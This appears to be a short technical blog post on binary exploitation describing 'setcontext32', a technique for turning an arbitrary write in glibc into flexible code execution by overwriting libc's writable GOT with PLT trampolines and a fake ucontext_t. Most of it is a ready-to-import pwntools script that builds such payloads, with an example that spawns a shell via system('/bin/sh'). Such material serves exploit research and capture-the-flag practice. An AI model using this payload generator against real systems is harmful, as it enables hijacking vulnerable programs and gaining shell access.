modern arb write -> rce is hard

Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of __free_hook are long gone; now you've got to leak the ptr mangling cookie to modify an existing __exit_funcs entry, maybe compute the offset to ld.so to overwrite l_addr and create a fake DT_FINI entry, or perhaps setup special _codecvt and _wide_data structures on hijacked IO objects I'd just like to specify the function I want to call and its arguments!

I want a flexible RCE primitive. I don't want to rely on _IO_cleanup, _dl_fini, or malloc to call my injected code. I want an inherently universal gadget, a gadget I can expect to be called with the most messed up heap bins and broken IO objects. I want to be able to call any function with any set of arguments without needing to stack pivot or pray system is stack aligned. I don't want to satisfy several constraints so one_gadget will work!

setcontext32

setcontext32 is a neat method to convert arbitrary write to flexible arbitrary code execution. Roughly, it looks like:

write(libc_write_address, flat( p64(0), p64(libc_write_address + 0x218) p64(setcontext+32), p64(libc_exe_address) * 0x40, cpu_state_information, ))

Where libc_write_address is the start of the writeable page in libc, libc_exe_address is the start of the executable page in libc, and cpu_state_information is a structure that contains all current registers, including rsp and rip.

high level overview

Every GOT entry in libc such as memset, memcpy, strcpy, and strlen is replaced with the PLT trampoline, which starts at the beginning of the executable page. The PLT trampoline pushes a fake linkmap, libc_write_address + 0x218, and calls a fake runtime resolver, setcontext+32, all of which starts at the beginning of the writeable page.

setcontext+32 pops libc_write_address + 0x218 off the stack, and treats it as a pointer to a saved ucontext_t. It'll then load your structure as the current CPU state.

Calling most libc functions will trigger setcontext32, including malloc, exit, and (almost?) every IO operation.

why

libc's GOT is writeable so that you may use architecture specific functions, such as memcpy optimized for SSE or AVX512. A friend also guessed that it could be for ltrace. I learned the libc GOT was writeable from pwndbg creator disconnect3d.

code

Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). An example is below.
setcontext32.py

from pwn import * def create_ucontext( src: int, rsp=0, rbx=0, rbp=0, r12=0, r13=0, r14=0, r15=0, rsi=0, rdi=0, rcx=0, r8=0, r9=0, rdx=0, rip=0xDEADBEEF, ) -> bytearray: b = bytearray(0x200) b[0xE0:0xE8] = p64(src) # fldenv ptr b[0x1C0:0x1C8] = p64(0x1F80) # ldmxcsr b[0xA0:0xA8] = p64(rsp) b[0x80:0x88] = p64(rbx) b[0x78:0x80] = p64(rbp) b[0x48:0x50] = p64(r12) b[0x50:0x58] = p64(r13) b[0x58:0x60] = p64(r14) b[0x60:0x68] = p64(r15) b[0xA8:0xB0] = p64(rip) # ret ptr b[0x70:0x78] = p64(rsi) b[0x68:0x70] = p64(rdi) b[0x98:0xA0] = p64(rcx) b[0x28:0x30] = p64(r8) b[0x30:0x38] = p64(r9) b[0x88:0x90] = p64(rdx) return b def setcontext32(libc: ELF, **kwargs) -> (int, bytes): got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT") plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr return got, flat( p64(0), p64(got + 0x218), p64(libc.symbols["setcontext"] + 32), p64(plt_trampoline) * 0x40, create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs), ) if __name__ == "__main__": libc = ELF("./libc.so.6") dest, payload = setcontext32.setcontext32( libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__() ) print(hex(dest), payload.hex())